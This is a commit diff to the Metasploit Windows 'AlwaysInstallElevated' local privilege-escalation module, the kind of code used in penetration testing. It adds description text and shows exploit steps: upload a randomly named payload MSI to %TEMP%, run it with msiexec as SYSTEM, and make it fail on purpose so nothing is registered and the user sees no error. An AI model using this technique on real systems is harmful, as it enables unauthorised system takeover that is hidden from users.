Tidy and updates to info

rapid7 · Sep 29, 2013 · b306415 · b306415
1 parent 29a7059
commit b306415
Showing 1 changed file with 9 additions and 9 deletions.
diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb
@@ -21,8 +21,12 @@ def initialize(info={})
     super(update_info(info, {
       'Name'          => 'Windows AlwaysInstallElevated MSI',
       'Description'    => %q{
-          This module checks the AlwaysInstallElevated registry keys which dictate if
+          This module checks the AlwaysInstallElevated registry keys which dictates if
         .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).
+        The generated .MSI file has an embedded executable which is extracted and run
+        by the installer. After execution the .MSI file intentionally fails installation
+        (by calling some invalid VBS) to prevent it being registered on the system.
+        By running this with the /quiet argument the error will not be seen by the user.
       },
       'License'       => MSF_LICENSE,
       'Author'        =>
@@ -47,7 +51,6 @@ def initialize(info={})
         [
           [ 'URL', 'http://www.greyhathacker.net/?p=185' ],
           [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
-          [ 'URL', 'http://wix.sourceforge.net'],
           [ 'URL', 'http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html']
         ],
       'DisclosureDate'=> 'Mar 18 2010',
@@ -93,23 +96,18 @@ def check
 
   def exploit
 
-    if check != Msf::Exploit::CheckCode::Vulnerable
-      return
-    end
+    return unless check == Msf::Exploit::CheckCode::Vulnerable
 
     msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
     msi_source = generate_payload_msi
 
     # Upload MSI
-    msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped
+    msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip
     print_status("Uploading the MSI to #{msi_destination} ...")
 
     write_file(msi_destination, msi_source)
     register_file_for_cleanup(msi_destination)
 
-    # Execute MSI
-    print_status("Executing MSI...")
-
     if datastore['LOG_FILE'].nil?
       logging = ""
     else
@@ -123,6 +121,8 @@ def exploit
     end
 
     cmd = "msiexec.exe #{logging}#{quiet}/package #{msi_destination}"
+
+    print_status("Executing MSI...")
     vprint_status("Executing: #{cmd}")
     begin
       result = cmd_exec(cmd)